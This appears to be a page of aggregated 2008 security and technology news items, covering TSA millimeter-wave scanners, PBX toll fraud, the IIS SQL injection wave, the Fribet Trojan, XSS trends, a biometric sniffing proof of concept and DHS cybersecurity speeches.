daily online news

Which would you prefer at the airport security check: a pat down or a "whole body imaging scan" that provides a highly detailed image of all your, um, curves (but does have your face blurred to protect your identity)?

The Transportation Security Administration (TSA) has been testing out these devices, called millimeter wave machines, at Phoenix's Sky Harbor International Airport and this week is adding the machines to Los Angeles International Airport and New York City's John F. Kennedy International.

The TSA says that during the test in Phoenix, 90 percent of travelers preferred the scan to having a full body pat down. The TSA agent viewing the image from one of the devices will be in a separate booth and will not be able to see the traveler's face in order to maintain privacy. After the image has been checked it won't be stored, according to the TSA.

Even so, are these images invasive? What about privacy concerns?According to the TSA blog, "These images are friendly enough to post in a preschool. Heck, it could even make the cover of Reader's Digest and not offend anybody."

The TSA also claims the machine emits 10,000 times less energy than a cell phone transmission.

You can see how the body image is captured in a video here and also watch a demonstration of the actual machine in motion here.

Millimeter wave machines are already in use at airports in Britain, Spain, Japan, Australia, Mexico, Thailand and the Netherlands. [Source CNN]

At least one Australian company every day falls victim to telephone hackers, who rack up an average bill of $78,000, a national telephone security expert said yesterday.

But David Stevens, managing director of Telecoms Security, said most businesses did not realise how easy it was until too late.

Australian Federal Police last night confirmed they were working with their international counterparts to stop hackers hitting Australian businesses, after it was revealed that criminals had penetrated the phone systems of at least two Melbourne companies in recent weeks.

The scam is allegedly being carried out by overseas manufacturers of international phone cards commonly used by students and tourists to make cheap calls.

The card manufacturers are believed to then hack into unsuspecting company's phone systems, known as a private automatic branch exchange (PABX), so the calls made by card users get charged to unsuspecting victims of the scam.

The Camberwell Electrics Superstore and Swinburne University have both been hit with collective phone bills of more than $100,000 of overseas calls. Camberwell Electrics' accountant Chris Koh said the company had been alerted when Telstra called it to ask why they had made $20,000 in overseas calls in less than two weeks.

"The calls were made to Romania, other parts of Eastern Europe, India, Russia and Asia out of office hours," Mr Koh said.

He said the hackers had bypassed codes, passwords and other security systems. Computers ran through combinations in milliseconds until they found the right one to exploit.

A Swinburne University spokeswoman said the university knew nothing of the scams until it received an $80,000 phone bill.

The university's chancellery executive director, Michael Thorne, said the charges related to phone numbers the organisation did not own.

Both companies are fighting Telstra over the bills.

But Mr Stevens said that while most companies took extra steps to protect their IT security from hackers, many left their telephone systems - both traditional PABX systems and modern VoIP systems - vulnerable.

He said telephone hacking was a lot more common than most people realised, and the onus was on businesses to protect themselves.

"Our figures show that one Australian company is being hacked every single day," he said.

Mystery IIS Hack Unveiled

Researchers at SANS have discovered how thousands of Web sites were compromised earlier this year. As a result of the break-ins countless users' computers were infected with malware.

Back in January, thousands of sites running Internet Information Server (IIS) and SQL Server were cracked by what at the time was thought to be some sort of SQL injection attack. As it turns out that is exactly what happened.

While reviewing malicious files served up by a particular server, researchers at SANS stumbled upon an attack tool that revealed exactly what was being done to crack the affected sites. According to the analysis provided by researcher Bojan Zdrnja, the tool queries Google to discover sites that are potentially vulnerable. The tool then tries to launch SQL injection attacks against each identified site. The tool's interface is written in Chinese and also had logic that attempted to contact a site in China to record transaction data.

A SANS blog reader, Nathan, wrote to elaborate on the nature of the SQL query itself. According to Nathan, the query used by the tool iterates through all tables to find specific types of columns and then appends data to existing column field data. The data then appears as part of Web pages at affected sites.

The SANS blog entry has links to a number of Web pages that can help administrators secure their sites against SQL injection attacks.

MySpace profile hack provides early warning to predators

A security issue on MySpace may put a spanner in the works of law-enforcement efforts to track miscreants using the social networking site.

Many MySpace profiles contain code that subscribes visitors to a profile's video channel. Normally this is all well and good, but hackers are able to subvert the feature for filthy purposes, according to Chris Boyd, security research manager at FaceTime Communications.

Hackers have set up dozens of accounts used as a springboard for spamming or attempts to vandalise other profiles.

The feature (used in conjunction with an IP address tracker) might also be employed by predators to keep tabs on anyone who might be tracking their activities, Boyd says. Although MySpace has made attempts to prohibit the use of IP trackers, miscreants have found a way around these blocks.

Crackers "are using every trick in the book they can to know who is watching them," Boyd said.

In particular, the feature could be used by predators to detect if their attempts to groom youngsters have come to the attention of law enforcement, potentially curtailing or frustrating evidence in child abuse investigations.

The tactic has been in play since at least October 2007. MySpace was informed of the issue in late March but is yet to act. According to Boyd, the social networking site has responded to his concerns about the issue by describing it as a "system error".

Pending a fix from MySpace itself, Boyd has posted advice to surfers about how to avoid tracking here, a tip child abuse investigators might well find useful.

Mobile working pushes up data loss risk

The IT security threat posed by healthcare workers is rising as they become increasingly mobile and use laptops containing sensitive patient information.

Unlike some other parts of the world, UK law does not protect data kept on healthcare computer systems beyond 'duty of care' and a professional requirement for patient confidentiality.

The warning from Absolute Software, which specialises in computer theft and asset tracking, follows a spate of high-profile data loss incidents in recent months, including the NHS losing hundreds of thousands of patients' records.

Absolute Software said that, while encryption provides strong external security, the biggest threat is from within.

Employees can get access to encrypted information as they have encryption keys and passwords. Organisations are advised to complement encryption with the ability to remotely delete data from missing computers for the highest level of protection.

The healthcare market also fails accurately to manage mobile computer assets. Absolute believes that, at best, only a fraction of laptops can be accounted for by IT managers.

Many hospitals and clinics allow information to be accessed on open-air terminals, such as ward and nursing stations. But these workstations are at great risk of data breaches and information can be easily accessed and downloaded.

Absolute said that unattended stationary computers should always be monitored and protected with an authentication prompt.

The company also highlighted the difficulty in implementing a comprehensive data security plan.

Healthcare facilities are advised to institute a comprehensive data security plan to secure computing assets and sensitive information which includes both IT and physical precautions.

Asset tracking and recovery software should be part of a comprehensive approach, which also includes cable locks, encryption software and secure passwords, the company said.

Lastly, few healthcare facilities have "nightmare scenario" policies in place should a data breach occur.

There should be a standard procedure in place to manage the event, from timely notification of supervisors to informing the police.

Absolute said that, in a data breach situation, computer theft recovery software solutions have the capability to remotely delete sensitive files, track lost or stolen computers and partner with local police in order to recover them.

The PCI Security Standards Council announced on Tuesday an updated version of its security standards for applications that process credit-card transactions, aiming to prevent data breaches such as those at Hannaford Bros. and the TJX Companies.

Known as the Payment Application Data Security Standard (PA-DSS), the compliance effort will allow the Council to become a "one-stop shop" for merchants who want to search for applications and services that will not increase their exposure to attacks, a PCI Security Standards Council spokesperson said. Version 1.1 of the standard (pdf) will make certain that payment applications do not store sensitive data, such as the information typically stored on the magnetic stripe on the back of credit and debit cards

"Having a single source of information on approved payment applications and security assessors provides business value to merchants and service providers and allows them to make informed choices regarding the security of their payment application," Bob Russo, general manager for the PCI Security Standards Council, said in a statement announcing the new standard.

The latest version of the application-security standard follows the revelation that online data thieves managed to make off with millions of credit- and debit-card numbers from grocery store chain Hannaford Bros. In 2007, retail giant TJX Companies also announced a large data breach, and by the end of the year, estimates of the size of the loss surpassed 100 million credit- and debit-card numbers. While TJX Companies had not complied with the PCI Data Security Standard, it is currently not known whether Hannaford Bros. had remained in compliance. According to Visa, about three-quarters of large companies and two-thirds of medium-sized firms had complied with the PCI's payment security standards by the end of 2007.

The PCI Security Standards Council plans to certify companies over the next year to be Payment Application Qualified Security Assessors (PA-QSAs). The application standard is based on Visa's Payment Applications Best Practices (PABP) requirements for its merchants.

Fring, the company founded by Avi Shechter, the former co–CEO of ICQ and VP at AOL, has announced that it released a test version of its popular application which brings Skype, as well as MSN, Google Talk and AIM to Apple's iPhone.

"This special pre-release version of fring, developed in conjunction with the Holon Institute of Technology academic research labs is a direct response to iPhone users kicking our behind to get fring for their COOOOOL devices," the company said on its website.

"Part of the objective here (besides getting you all excited with fring for iPhone) is to get feedback prior to release of the full-feature version and create a truly superb user experience for iPhone users," Fring says.

The fring application is only available to those who jailbroke their iPhones or iPod Touches. The application is not endorsed by Apple which is against VoIP applications for its gadgets. This is the case because access to free calls could dramatically cut into the profit margins of the carriers licensed to supply the handset, and everything Apple does is about large profit margins (like its Mac desktop computers). Also, application runs in the background, which is forbidden by Apple.

Of course, the iPod Touch does not have a microphone so you need the Touchmods dock connector microphone.

Fring, also co-founded by Boaz Zilberman and Alex Nerst, is headquartered in Israel, and has representation in Italy, UK and Germany. In February, BusinessWeek reported that more than 100,000 new users from 160 countries were downloading, installing, and registering to use fring each month.

A security firm claims to have uncovered a denial-of-service vulnerability in version 1.1.4 of Apple's Safari web browser for the iPhone.

Radware said that the phone is vulnerable to DoS attacks owing to a design flaw that may be triggered by a series of memory allocation operations on the dynamic memory pool, which in turn triggers a bug in the garbage collector.

"While vendors are struggling to push new products and applications, it is evident that security still remains a secondary concern," said Itzik Kotler, security operation centre manager at Radware.

"Hackers continue to misappropriate other people's software and their job is made easier by design flaws embedded into software products."

To exploit the vulnerability, an iPhone user must open an HTML page which contains JavaScript that manifests this vulnerability.

Once at the site, an application-level DoS attack crashes the Safari browser and could go as far as crashing the iPhone completely.

Users could be lured to sites containing this attack via links in spam messages or other social engineering techniques.

It is unclear whether the fault can cause any permanent damage to the phone or is simply a nuisance.

Women are four times more likely than men to give out "passwords" in exchange for chocolate bars.

A survey by of 576 office workers in central London found that women are far more likely to give away their computer passwords to total strangers than their male counterparts, with 45 per cent of women versus ten per cent of men prepared to give away their login credentials to strangers masquerading as market researchers.

The survey, conducted outside Liverpool Street Station in the City of London, was actually part of a social engineering exercise to raise awareness about information security in the run-up to next week's Infosec Europe conference.

Infosec has conducted similar surveys every year for at least the last five years involving punters apparently handing over login credentials in exchange for free pens or chocolate rewards.

Little attempt is made to verify the authenticity of the passwords, beyond follow-up questions asking what category it falls under. So we don't know whether women responding to the survey filled in any old rubbish in return for a choccy treat or handed out their real passwords.

This year's survey results were significantly better than previous years. In 2007, 64 per cent of people were prepared to give away their passwords for a chocolate bar, a figure that dropped 21 per cent this time around.

So either people are getting more security-aware or more weight-conscious. And with half the respondents stating that they used the same passwords at home and work, then perhaps the latter is more likely.

Taken in isolation the password findings might suggest the high-profile HMRC data loss debacle had increased awareness about information security. However, continued willingness to hand over personal information that could be useful to ID fraudsters suggests otherwise.

The bogus researchers also asked for workers' names and telephone numbers, ostensibly so they could be entered into a draw to go to Paris. With this incentive 60 per cent of men and 62 per cent of women handed over their contact information. A similar percentage (61 per cent) were happy to hand over their dates of birth

PBB Teen Editon Plus Scandal ( Beauty )

WILLIAMSVILLE, N.Y. (AP) - Authorities say several current and former students broke into a school districtÂ’s computer system in western New York last month and copied secure files that included the personal information of employees.

The computer breach by Williamsville North High School students marks the third incident in the past month. Students in the Grand Island and West Seneca districts have been charged with unauthorized computer use.

Amherst Police Chief John Askey tells the Buffalo News that students overrode the security defenses of a classroom computer at Williamsville North and went trolling for information.

At least three individuals are suspected, and several more knew about it. Those involved have told police they simply were interested in how far they could get into the system.

Askey adds that several of the hackers are considered "very bright kids" and good students with no lengthy disciplinary records. It may take weeks to determine the extent of the breach.

Superintendent Howard Smith sent a letter this week to the districtÂ’s 1,800 employees, asking them to notify police if they uncover any suspicious credit card or banking activity.

Copyright 2008 The Associated Press. All rights reserved. This material may not be published, broadcast, rewritten or redistributed.

MOUNTAIN VIEW, Calif.--Corey Fro is chasing a large metal orb across the pavement at the NASA Ames Research Center here. He is desperately trying to make sure that the orb doesn't crush a nearby robot.

The orb in question is being remotely directed by a kid wielding an Xbox-like wireless controller, but it's the kid's first time using the device, and he really doesn't have any idea what he's doing.

And that's why the orb has rolled away and is bearing down rapidly on the unsuspecting and defenseless robot a few yards away. In the end, Fro caught the wayward sphere and saved the day, or at least the innocent robot.

If this sounds unusual, it isn't. At least not at Yuri's Night, a 12-hour celebration of space, science, music, and art held at NASA Ames and other locations around the world Saturday in honor of Russian cosmonaut Yuri Gagarin's first flight into space.

The orb is part of Swarm, a project designed for Burning Man built around the concept of autonomous spheres that can be programmed to perform in one of many ways.

Or, as Fro put it, "They're kinetic sculptures that drive around in an autonomous but choreographed pattern."

Fro is just one of about 30 people who built the orbs for Burning Man 2007, and now the project is returning to Burning Man 2008 as an art piece partially funded--and therefore honored as noteworthy--by the curators of the annual countercultural arts festival.

But before it can go back out to the Nevada desert, Swarm had to make an appearance at Yuri's Night, and it was certainly one of the main attractions for the thousands in attendance Saturday.

And that's at least in large part because of what they can do.

"The orbs control their own movement, light show, and music," explained Fro. "The way they do that is by communicating with the mother node."

"The Swarm of autonomous beings by their very nature will have emergent and complex behavior," the project's Web site states. "They will flock, flirt, dance and interact, and their actions will surprise and astonish even us, their creators. They are simple, but together they will behave in ways more complex than we can predict."

The idea is that five of the six orbs--which look something like specialized see-through hubcaps turned into spheres with really expensive robotic controls and LEDs inside--are subservient to the desires of the lead orb, or mother node.

The only information the subservient orbs send out is GPS and accelerometer data, which they send to the lead orb, which, Fro said, uses that information to coordinate the movements and lighting effects of all the spheres.

"So the movement coordination allows it to follow the leader, drive in patterns or (even) make the orb representation of planetary systems," Fro said. "But once they're running under control of the mother node, there's no control from humans.

That means, once all the orbs are in motion--something that wasn't on display at Yuri's Night--the only way to stop them is direct the mother node to stop.


Each orb, Fro said, is driven by counterbalancing using the weight of lead-acid batteries as ballast. By swaying the ballast forward, the orb moves forward as the center of gravity changes.

"To turn right or left," Fro said, "we swing the ballast right or left."

At Burning Man, where the entire project, in its 2008 configuration, will be unfurled, the Swarm team plans to erect a mast on the open desert floor that projects a large laser circle on the ground.

The idea is to define a safety zone so that pedestrians, bicyclists, and those on other forms of conveyance are safe.

"If they walk into that circle," Fro said, "all bets are off."

I was very happy to see the orbs at Yuri's Night because Swarm was one of the legendary art projects I missed at Burning Man 2007. It was something I heard a lot of people talk about after the fact in very reverent terms.

And as befits many Burning Man art projects, the 2008 version is sure to be new and improved. In fact, Fro said, the Xbox-like controllers were a big part of what's new for this year: joysticks that can allow anyone to take very subtle control over the orbs.

But it's also very easy to lose control of them, as I saw multiple times on Saturday as Fro would hand the controller over to one person or another.

"Try not to rock it so much," he said to someone at one point, "because if you hit the kill switch, it will stop."

A Colombian citizen has been sentenced to nine years in prison for a complex computer fraud which affected more than 600 people.

Mario Simbaqueba Bonilla, 40, was also sentenced to three years supervised release on his exit from prison, and ordered to pay restitution of $347,000.

Simbaqueba Bonilla pleaded guilty in January to charges of conspiracy, access device fraud and aggravated identity theft.

According to the charges Simbaqueba Bonilla, alone and in concert with a co-conspirator, engaged in a complex series of computer intrusions, identity thefts and credit card frauds designed to steal money from payroll, bank and other accounts.

The court recognised the attempted and actual loss from the scheme at $1.4m.

Much of the identity theft, initiated from computers in Colombia, targeted individuals residing in the US, including Department of Defense personnel.

Simbaqueba Bonilla used the money to buy expensive electronics and luxury travel and accommodation in various countries, including Hong Kong, Turks and Caicos, France, Jamaica, Italy, Chile and the US.

The man engaged in a conspiracy between 2004 to 2007 that began with illegally installing keystroke logging software on computers located in hotel business centres and internet lounges around the world.

This software collected the personal information of those who used the computers, including passwords and other identifying information used to access bank, payroll, brokerage and other accounts online.

Simbaqueba Bonilla used the data to steal or divert money into accounts he had created in the names of other people he had victimised in the same way.

Through a complex series of electronic transactions designed to cover his trail, Simbaqueba Bonilla transferred the stolen money to credit, cash or debit cards and had the cards mailed to himself and others at commercial mailing addresses.

Federal agents arrested Simbaqueba Bonilla when he flew into the US in August 2007.

At the time of his arrest, Simbaqueba Bonilla was flying on an airline ticket purchased with stolen funds, and had in his possession a laptop also purchased with stolen funds.

The laptop contained the names, passwords and other personal and financial information of more than 600 people.

Security researchers have unearthed more details about a Trojan that targets backend databases as well as desktop clients.

The Fribet Trojan has been planted on pro-Tibet websites, possibly using a Vector Markup Language flaw (MS07-004) patched by Microsoft early last year. When visitors to the pro-Tibet websites are infected, the Fribet Trojan creates a backdoor on compromised hosts.

In addition, the Trojan loads a "SQL Native Client" ODBC library that's designed to execute arbitrary SQL statements received from a command and control server. The feature provides the ability to run arbitrary SQL commands from compromised machines onto connected database servers. This functionality allows hackers to steal data or modify databases, providing they are able to log onto these databases in the first place.

The attacker still needs to find out the host name, database name, username and password. However, monitoring functions included with Fribet as well as easily-guessable weak and default values might leave the door open for hackers, net security firm McAfee reports.

The Fribet Trojan emerges little more than a month after SQL injection attacks, which inserted iFrame links to sites hosting exploit scripts and malware on legitimate websites.

Unlike those attacks, the Fribet Trojan can be used against the attack sites protected against conventional SQL injection attacks. McAfee researchers Shinsuke Honjo and Geok Meng Ong explain.

"This Trojan apparently can be used as an alternate to SQL Injection attacks, but in a more direct way," they write. "Even the administrators of secure web sites, protected against common SQL injection attacks, should ensure database backends are equally secure to defend against such a penetration vector.

Web designers making very old mistakes are letting malicious hackers hijack visitors to their sites, say experts.

Many of the loopholes left in the code created for websites have been known about for almost a decade say the security researchers.

The poor practices are proving very attractive to hi-tech criminals looking for a ready source of victims.

According to Symantec the number of sites vulnerable in this way almost doubled during the last half of 2007.

Wholly vulnerable

Kevin Hogan, director of security operations at Symantec, said the bug-ridden web code was putting visitors to many entirely innocent sites at risk.

"It overturns the whole notion that if you stay away from gambling and porn sites you are okay," he said.

The attack that a malicious hacker can carry out via these web code vulnerabilities is known as cross-site scripting (abbreviated as XSS).

Typically these involve lax control of the data being swapped between a web server and the browser program someone is using to interact with it.

An XSS vulnerability could, for instance, allow attackers to steal the login credentials of a visitor to a site.

Mr Hogan said more and more attackers were looking for websites that were vulnerable to these scripting attacks because they required little work to mount.

By contrast, said Mr Hogan, a phishing attack required the creation of tempting e-mails, fake servers and dead-drops to gather data.

In its most recent Internet Security Threat Report Symantec identified 11,253 specific XSS vulnerabilities in the last six months of 2007. Six months earlier the count stood at 6,961.

Symantec said there were likely many more that had not reported vulnerabilities.

Drawing its data from XSSED which gathers data on these vulnerabilities, Symantec said only 473 of these loopholes had so far been fixed.

Website administrators had a poor record of closing loopholes, it said.

"Attackers..., can expect that [a] site maintainer will not address the vulnerability in a reasonable amount of time, if at all," said the report.

"There are a lot more websites out there that are prone to this," said Mr Hogan. "It's a much bigger proposition to make a safe website than it is to patch a browser."

Chris Wysopal, co-founder and chief technology officer at Veracode which produces online tools that scan code for security flaws, said the problem was getting worse.

"I do not see trends slowing this down," he said.

XSS attacks were becoming more popular because more and more websites were writing their own snippets of code so visitors could get more out of a site, he said.

Unfortunately, he added, the same mistakes were being made in this custom code years after they were first discovered.

"The problem was identified eight years ago or so," he said. "Over time attackers have figured out better and more interesting things to do with cross-site scripting."

He added: "It's such a target rich environment I do not think the attackers need to have a very sophisticated way to harvest sites for vulnerabilities."

Automated web tools were available that can scan custom web code and highlight vulnerabilities but few web designers used them, said Mr Wysopal.

"The awareness is not there that if you write code you need to test it before you put it out there," he said.

SAN FRANCISCO--It turns out al-Qaida's leader and his cohorts aren't the biggest threat to our cybersecurity. You are.

Six years ago, Osama bin Laden represented the nightmare scenario for the computer security establishment. But more immediate cyberdangers lurk on the horizon. Experts attending the RSA conference that began here today say it's you--Mr. & Mrs. Computer User--who keep goofing up.

In fact, they contend, the future of cybersecurity hinges less on a latter-day version of spy-versus-spy against shadowy terror groups than on a more serious effort to instill best practices. Listening to their heeding was something akin to the scene in the movie Groundhog Day, where Bill Murray repeatedly wakes up to the same morning.

Security gurus have long urged the business world to turn network security into part of the corporate DNA. The message is not fully getting through. And now we're seeing the predictable results.

After listening to Symantec's John Thompson's morning keynote, I later kidded him about purposely scaring the hell out of people. He was a good sport about my joshing but pointed out that the information security landscape is increasingly punctuated by cases of data theft. He backed that up by reciting a litany of worrisome stats from his company's latest Internet security threat report. Truth be told, it makes for grim reading.


Symantec CEO John Thompson
(Credit: Charles Cooper/CNET News.com)


Among the report's highlights:


• 65% of the new code being released into the market is malicious


• The U.S. was the top country of attack origin in the second half of 2007


• The education sector accounted for 24 percent of data breaches that could lead to identity theft.


• Government was the top sector for identities exposed, accounting for 60 percent of the total


• Theft or computer loss resulted in the most data breaches that could lead to identity theft


• The United States had the most bot-infected computers worldwide

If the statistics are accurate, rank-and-file computer users are far from internalizing the security mantra. What's more, the findings suggest it will be quite some time before most people treat computer security as more than an afterthought. In the meantime, of course, Thompson didn't preclude the possibility of a terror or state-based organization launching a big cyber attack. But he believes the more likely danger to the nation's infrastructure will emanate from a different quarter.

"The threat landscape has changed," he said. "When people used to talk about the "Big One," they were thinking about that in the context of an attack on the infrastructure itself. That's still possible but less probable today because attackers have shifted to the information itself. They're much more stealth-like. Before, they wanted to become obnoxiously visible. Now they don't. They want to quietly penetrate defenses so they can sell what they steal in what's become a growing underground economy."


DHS Secretary Michael Chertoff
(Credit: Charles Cooper/CNET News.com)

(He's got a point. Symantec's report found that bank accounts are the most commonly advertised item for sale on underground economy servers, accounting for 22 percent of all activity tracked.)

In years past, Thompson and other computer security executives have pushed the idea of making cyber-security as familiar to most people as the fire prevention campaign underwritten by the government in the 1960s and 1970s. Considering the amount of money Uncle Sam is spending on cyber-security these days, that's a pipedream.

Department of Homeland Security Secretary Michael Chertoff, who also presented a keynote on Tuesday, offered litte indication Washington was about to ride to the rescue. In remarks during his prepared speech and subsequent press conference, Chertoff offered a dutiful recitation of what he described as the President's interest in shoring up the nation's digital security.

But despite Chertoff's repeated commitment to doing the right thing - including a call to arms inviting Silicon Valley's best and brightest technologists to come to Washington to work on cyber-security - I wonder how many industry skeptics he'll win over. Until recently, DHS couldn't get a cyber-security director to stay in what essentially was a figure-head job much longer than a year. Off-the-record interviews with people familiar with the goings-on there have described the situation to me as a bureaucratic mess.

DHS finally staffed up by putting in Greg Garcia, a former official with the Information Technology Association of America trade organization, as assistant secretary for cybersecurity and telecommunications. More recently, Rod Beckstrom, an author and entrepreneur best-known for starting business collaboration software maker Twiki.net, was in charge of directing a national cybersecurity center that operates inside DHS.

Give Chertoff credit for being candid about where DHS has come up short. He said the government needs to reduce its (literally) thousands of network access points to around 50. At the same time, Chertoff wants his department to faster detect and analyze computer anomalies. A big part of that will involve a revamp of U.S. CERT's early warning system

"Even giving an adversary one bite at the apple before we've figured out the meta data or (digital) signature is one bite too many," he said.

In the end, however, money talks and you-know-what walks. The feds only have a $115 million budget to work with. Chertoff's department has requested $192 million for the new fiscal year but that's still doing it on the cheap. By comparison, we spend $720 million in Iraq each day.

The UK is catching up the US as an internet crime hotspot, according to IT security consultancy Global Secure Systems (GSS).

GSS bases its warning on a study of the recently released Internet Crime Report by the Internet Crime Complaint Centre (IC3).

"Despite the fact that the IC3 study is a national US annual report, it concludes that the UK is in second position with 15.3 per cent when it comes to the origin of US internet crime reports," said David Hobson, managing director of GSS.

"This is significantly ahead of other cyber-crime hotspots such as Nigeria (5.7 per cent) and Romania (1.5 per cent). It's also worth noting that internet crime in the US hit an all-time high in 2007, with an almost 20 per cent increase on the fraud reported in 2006."

According to Hobson, reported internet crime losses are only the tip of the cyber-crime iceberg, as there are many more cases that go unreported for various reasons.

He added that the report should act as a "wake-up call" to companies that are not properly securing their networks from attack from the organised criminal gangs who are prowling the web searching for new targets.

"How they achieve their fraud is irrelevant. If they can find a way in, they will," he said.

According to the IC3 report, 90,008 complaints were referred to federal, state and local law enforcement agencies across the US.

According to Hobson: "That's around one complaint every six minutes throughout the year, day and night. If that statistic doesn't make a company IT manager sit up and take note, I don't know what will."

At the end of February Home Office minister Meg Hillier explained the UK ID scheme security system to the Home Affairs Committee. "The National Identity Register, essentially," she said, "will be a secure database; ...hack-proof, not connected to the Internet... not be accessible online; any links with any other agency will be down encrypted links."

Except she didn't, apparently, because by the time the Committee session transcript was published, here, Hillier words had become: "The National Identity Register, essentially, will be a secure database; it will not be accessible online; any links with any other agency will

be down encrypted links."

Spooky? We are indebted to William Heath's Ideal Government blog for spotting the difference between what was actually said (noted at the time by an eyewitness) and what appeared in the official record. We should also explain at this point that Hansard, the UK parliamentary record system, is not intended to function as an entirely verbatim transcript of proceedings. It is largely verbatim, but includes some facility for publishing what the speaker meant to say, or perhaps even what they ought to have said.

Ordinarily, however, changes amount to little more than polishing and seldom materially affect the meaning. Ordinarily...

In this case, the removal of "hack-proof, not connected to the Internet" goes some way beyond minor polishing. Do we understand from this that Hillier's officials think it unwise (which, of course, it is) to claim that the NIR is hack-proof? And are they keen to leave wiggle-room on Internet connectivity? A database that is "not accessible online" is not necessarily the same thing as a database that is not connected to the Internet, depending on what you might mean by "not accessible".

Hillier is relatively new to the ID card brief at the Home Office, and has come up with several improbable and/or unfortunate claims in recent months (e.g., "we should see an identity card, like a passport, in country"). At the Committee session, Ideal Government reports that "the officials present were passing notes to try to get her back on message", which we would guess is just the sort of thing that's likely to prompt the acute observer to take especially careful notes. It's a tough job minding some people. ®

Virginia became the first state this year to require Internet safety courses in its public schools. Illinois and Texas both have laws on the books relating to curriculum and instruction in this area, but Virginia is currently the only state to require such courses according to VNUNet.

As one student in the article pointed out,

James River High School student Maya Towers said: “I thought it was very important because we post a lot of things on the internet. I didn’t know how much information can be exposed.”

This highlights the attitudes of most of our students. While some conceal their identities on MySpace, Facebook, AOL, and other bits of social media, many others blithely post pictures, locations, and even phone numbers and addresses.

Now that my students have discovered Twitter, I’ve had to warn them about being too revealing in their tweets. Few realized that the growing network of followers (particularly for my feed) had access to any information they posted. Fortunately, most of my followers are either students or other folks interested in the educational value of social media. However, even these followers don’t need to know that Ashley and Susie are at the local movie theater alone and will be getting out at 9:45.

The level of naivete among many students is disturbing at best; well-planned curricula in the public schools could go a long ways towards keeping safe as we increasingly live a second life (no pun intended) online.

YOUR COUNTRY NEEDS you, nerd, seemed to be US Homeland Security chief, Michael Chertoff’s message to Silicon Valley in his patriotic keynote speech at the RSA Conference in San Francisco yesterday.

Chertoff even went as far as saying that future cyber attacks could be on the scale of the attacks suffered by the US in 9/11, a desperate strategy attempting to appeal to the nationalism and conscience of Valley workers, as opposed to appealing to their wallets. (But, hang on, aren’t most of them foreign anyway?)

In what sounded more like a military troop rally, the security chief told the auditorium full of Valley workers to stand up and be counted in America’s fight to secure the cyber highway, noting "The human and economic sacrifices from a cyber-attack can be devastating ... on par with what this country experienced on September 11".

Taking out a small onion and with tears of patriotism in his eyes, he begged the private sector to "please send some of your brightest and best to do service in the government", referring to a new inter-agency group (National Cyber Security Center) set up to act as an early warning system for major network attacks that would help the federal government protect its computer networks from organised cyber attacks. He theatrically added that joining up would be " the best thing you can do for your country".

Chertoff thought it best to instill terror in his yuppie audience about the potential chaos that could be caused if cyber attacks were to hit financial or government bodies, melodramatically stating "a single individual, a small group or a nation state can exact damage and destruction similar to dropping a bomb or explosives."

Noting that the US government took threats to the online world as seriously as those in the real world, Chertoff also outlined government plans to develop the equivalent of the "Manhattan Project" to defend US federal networks and national security interests from the big bad boogey man of large-scale cyber-attacks

A British researcher has developed a biometric keylogger of sorts that can capture fingerprints required to unlock building doors or gain access to computer networks or other restricted systems.

For now, the Biologger is a proof-of-concept aimed at showing the insecurity of many biometric systems, according to Matthew Lewis, who demonstrated the tool at last month's Black Hat Amsterdam conference. But the researcher, who works for Information Risk Management, warns the attack could become commonplace if current practices don't change and could be used to log images of retinas, facial features and any other physical characteristics used by biometric systems.

"Biometric device manufacturers and system integrators cannot rely on security through obscurity alone for the overall security of their devices and systems," he writes in this white paper (PDF). "Without adequate protection of the confidentiality, integrity and availability of biometric access control devices and their data, the threat of "Biologging" activities within those enterprises employing such access controls is real."

The unspecified access control device used in Lewis's demonstration didn't bother to encrypt data before sending it to back-end servers, making it ripe for interception by a man-in-the-middle laptop that logged all traffic passing between the two devices. The researcher was able to construct an image of a fingerprint by subjecting portions of the captured data to an algorithm designed to graphically identify image data and resolution.

"The result of such a finding to attackers could be significant," Lewis wrote. "If a good quality image can be reconstructed, then it is conceivable that techniques described ... could again be used to generate a 3D spoof finger of users that have obviously been registered with the system at some point."

The research is the latest cautionary reminder that biometrics are by no means a panacea to the difficulty of verifying a person's identity. Last week, a hacker club published what it said was the fingerprint of Wolfgang Schauble, Germany's interior minister and an ardent supporter of storing a digital representation of citizen's fingerprints in their passports. Schauble's print was embossed on a sticky piece of plastic that can leave the print on coffee cups, telephones and biometric readers.

Lewis was also able to issue commands to the access control device that enabled him to unlock doors and add new users with full administrative rights without presenting a fingerprint. That's because the device needed a single 8-byte message that passed over the network in plaintext. Although he was never able to crack a 2-byte checksum used for issuance of each message, he was able to overcome this limitation by taking a brute-force approach, in which every possible combination of checksums was used.

There are other limitations to Lewis's attack. For one, it requires attackers to have privileged access to the network connecting the access point to the server. Another is that the traffic was transmitted using the user datagram protocol, which rendered the brute-force attempts "not 100% reliable."

But his point seems to be that, just as best practices require that passwords are never stored in the clear, fingerprints and other biometric data should likewise be encrypted. Architects designing the next generation of biometric systems,

A plan to expand the number of government police and security agencies that can tap into detailed satellite images is proceeding, despite concerns from Congress, the head of the U.S. Department of Homeland Security said Wednesday.

During a roundtable discussion with bloggers and journalists here, Secretary Michael Chertoff said a "charter has been signed" to create a new office, which will serve as a clearinghouse for requests from law enforcement, border security, and other domestic homeland security agencies to view feeds from powerful satellites. It will be called the National Applications Office.

"I think the way is now clear to stand (the office) up and go warm on it," said Chertoff at Homeland Security's headquarters here.

Right now, these spy satellites are more commonly used for things like monitoring volcanic activity, hurricanes, floods, and various environmental and geological shifts. But the agency has said it sees important applications for the images in other areas within its purview, such as terrorism investigations and illegal immigration busts.

Originally, the satellite office was supposed to take shape last October but those plans were delayed after congressional Democrats raised privacy concerns. They said they wouldn't be able to support the program until the agency lays out exactly what legal framework it will be using to fulfill requests by, say, state and local police, and how it will protect Americans' civil liberties.

Chertoff said Wednesday that the department has completed the privacy impact assessments for the new office and should be releasing them within a few days. He said that members of Congress have received briefings and that he thinks there's a "good process in place to make sure there aren't any legal transgressions."

In the past, Homeland Security officials have downplayed the implications of allowing more agencies to access the satellites, arguing that in addition to scientific applications, the technique has already been employed from time to time by the Secret Service and FBI. For instance, when a well-publicized series of sniper attacks swept through the Washington, D.C., area in October 2002, the CIA and FBI were permitted to use images provided by the National Geospatial Intelligence Agency to look for places snipers might hide along highways along the east coast.

"I think we have fully addressed everybody's concerns," Chertoff said Wednesday. "We've made it clear this is not going to be interception of communications, verbal or oral or written. That's still going to be done under the traditional way."

The Homeland Security secretary, however, may not have that easy a time persuading congressional overseers.

